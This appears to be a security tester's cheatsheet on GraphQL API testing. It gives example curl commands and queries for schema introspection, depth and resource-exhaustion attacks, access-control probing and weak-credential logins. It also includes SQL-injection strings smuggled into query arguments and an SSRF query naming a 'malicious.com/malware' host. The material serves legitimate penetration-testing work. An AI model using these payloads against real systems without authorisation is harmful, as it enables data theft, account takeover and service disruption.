Neko

API and GraphQL

API's are especially vulnerable to auth and injection bugs. But, since I've covered those, I'll go over recon, introduce some bugs that are exclusive to APIs and talk about GraphQL.

Last updated: March 5th, 2023

API

Recon

Common API bugs

GraphQL

Below I've provided a practical cheatsheet with example commands, it will need to be adjusted to the endpoints in the target application.

  1. Enumerate GraphQL Schema:
    • Retrieve the GraphQL schema using introspection queries:
      • curl -X POST -H "Content-Type: application/json" -d '{"query":"query IntrospectionQuery { __schema { queryType { name } ... } }"}' <GraphQL_Endpoint_URL>
  2. Testing Query Operations:
    • Test for GraphQL injection:
      • query {
  user(id: "1' OR 1=1 --") {
    id
    name
    email
  }
}
    • Test for excessive data exposure:
      • query {
  users {
    id
    name
    password
  }
}
    • Test for nested query depth attacks:
      • query {
  user {
    posts {
      comments {
        user {
          posts {
            comments {
              # Continue nesting as required
            }
          }
        }
      }
    }
  }
}
    • Test for enumeration attacks:
      • query {
  user(role: ADMIN) {
    id
    name
    email
  }
}
    • Test for access control vulnerabilities:
      • query {
  adminOnlyField
}
    • Test for server-side request forgery (SSRF):
      • query {
  userProfilePicture(url: "http://malicious.com/malware") {
    url
  }
}
  3. Testing Mutation Operations:
    • Test for unauthorized mutation operations:
      • mutation {
  createPost(title: "New Post", content: "This is a test post") {
    id
    title
  }
}
    • Test for injection vulnerabilities:
      • mutation {
  updateProfile(name: "New Name', email = 'attacker@example.com' WHERE id = 1; --") {
    id
    name
    email
  }
}
    • Test for data integrity issues:
      • mutation {
  deletePost(id: "1") {
    success
  }
}
    • Test for rate limiting and throttling:
      • mutation {
  createPost(title: "New Post", content: "This is a test post") {
    id
    title
  }
}
  4. Testing Subscription Operations:
    • Test for unauthorized subscription access:
      • subscription {
  newPost {
    id
    title
  }
}
    • Test for injection vulnerabilities:
      • subscription {
  userLoggedIn(username: "admin' OR 1=1 --") {
    id
    username
  }
}
    • Test for excessive resource consumption:
      • subscription {
  allPosts {
    id
    title
    content
  }
}
  5. Testing Security Headers:
    • Use tools like curl or browser developer tools to check response headers:
      • curl -I <GraphQL_Endpoint_URL>
  6. Testing Authentication and Authorization:
    • Test for authentication bypass vulnerabilities:
      • query {
  user(id: "1") {
    id
    name
    email
  }
}
    • Test for authorization bypass:
      • query {
  adminOnlyField
}
    • Test for session management vulnerabilities:
      • mutation {
  login(username: "admin", password: "weak_password") {
    token
  }
}
  7. Testing Error Handling:
    • Trigger an error and check the response:
      • query {
  nonexistentField
}
    • Test for sensitive information exposure:
      • query {
  user(id: "123") {
    id
    name
    password
  }
}
  8. Testing Performance and Resource Consumption:
    • Send a high-complexity query to test performance:
      • query {
  allPosts {
    id
    title
    comments {
      id
      content
    }
  }
}